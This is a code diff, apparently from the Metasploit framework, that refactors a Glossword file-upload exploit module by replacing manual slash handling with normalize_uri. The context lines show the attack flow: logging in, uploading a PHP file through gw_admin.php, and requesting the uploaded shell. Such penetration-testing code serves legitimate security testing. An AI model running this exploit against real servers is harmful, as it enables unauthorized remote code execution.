Uses normalize_uri instead of manually adding a slash

Author: sinn3r

modules/exploits/multi/http/glossword_upload_exec.rb

@@ -51,7 +51,6 @@ def initialize(info={})
 	def check
 
 		base  = target_uri.path
-		base << '/' if base[-1, 1] != '/'
 		peer  = "#{rhost}:#{rport}"
 		user  = datastore['USERNAME']
 		pass  = datastore['PASSWORD']
@@ -105,7 +104,7 @@ def upload(base, sid, fname, file)
 
 		res = send_request_cgi({
 			'method'  => 'POST',
-			'uri'     => "#{base}gw_admin.php",
+			'uri'     => normalize_uri(base, 'gw_admin.php'),
 			'ctype'   => "multipart/form-data; boundary=#{data.bound}",
 			'data'    => data_post,
 		})
@@ -117,7 +116,7 @@ def login(base, user, pass)
 
 		res   = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{base}gw_login.php",
+			'uri'    => normalize_uri(base, 'gw_login.php'),
 			'data'   => "arPost%5Buser_name%5D=#{user}&arPost%5Buser_pass%5D=#{pass}&arPost%5Blocale_name%5D=en-utf8&a=login&sid=&post=Enter"
 		})
 		return res
@@ -127,7 +126,6 @@ def login(base, user, pass)
 	def exploit
 
 		base  = target_uri.path
-		base << '/' if base[-1, 1] != '/'
 		@peer = "#{rhost}:#{rport}"
 		@fname= rand_text_alphanumeric(rand(10)+6) + '.php'
 		user  = datastore['USERNAME']
@@ -163,7 +161,7 @@ def exploit
 		begin
 			res   = send_request_cgi({
 				'method' => 'GET',
-				'uri'    => "#{base}gw_admin.php?a=edit-own&t=users",
+				'uri'    => normalize_uri(base, 'gw_admin.php?a=edit-own&t=users'),
 				'cookie' => "sid#{token}=#{sid}"
 			})
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
@@ -182,7 +180,7 @@ def exploit
 		begin
 			send_request_cgi({
 				'method' => 'GET',
-				'uri'    => "#{base}#{shell_uri}",
+				'uri'    => normalize_uri(base, shell_uri),
 			})
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")